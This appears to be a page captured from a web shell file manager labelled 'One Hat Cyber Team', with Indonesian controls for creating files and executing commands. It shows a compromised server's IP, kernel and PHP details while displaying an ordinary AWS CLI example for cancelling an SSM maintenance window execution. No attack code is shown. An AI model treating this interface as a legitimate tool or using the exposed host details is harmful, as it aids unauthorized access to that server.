⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.133
Server IP:
185.119.109.197
Server:
Linux managedhosting.chostar.me 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.1.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
awscli
/
examples
/
ssm
/
View File Name :
cancel-maintenance-window-execution.rst
**To cancel a maintenance window execution** This ``cancel-maintenance-window-execution`` example stops the specified maintenance window execution that is already in progress. :: aws ssm cancel-maintenance-window-execution \ --window-execution-id j2l8d5b5c-mw66-tk4d-r3g9-1d4d1EXAMPLE Output:: { "WindowExecutionId": "j2l8d5b5c-mw66-tk4d-r3g9-1d4d1EXAMPLE" } For more information, see `Systems Manager Maintenance Windows Tutorials (AWS CLI)
`__ in the *AWS Systems Manager User Guide*.